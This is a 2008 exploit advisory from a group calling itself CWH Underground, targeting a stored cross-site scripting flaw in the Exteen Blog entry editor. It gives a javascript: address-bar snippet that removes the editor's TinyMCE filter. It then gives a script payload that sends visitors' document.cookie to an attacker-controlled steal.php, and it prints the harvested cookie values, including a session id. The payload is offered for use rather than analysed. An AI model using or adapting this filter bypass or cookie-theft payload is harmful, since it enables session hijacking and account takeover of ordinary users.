|
==========================================================
Exteen Blog XSS Remote Cookie Disclosure Exploit
==========================================================
AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : Exteen Blog
VENDOR : www.exteen.com
#####################################################
--- Vulnerable page ---
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)
--- Description ---
There are 2 ways to exploit this page
1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display
= 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable javascript on your Browser and visit vulnerable page
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D
--- Exploit (Grabbing Cookies)---
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
--- Note ---
This website implement httpOnly that prevent from stealing cookies on ie (>= 6) and firefox (>= 2.0.0.5)
=Result=
IE & Gecko: _uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570;
keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################
|
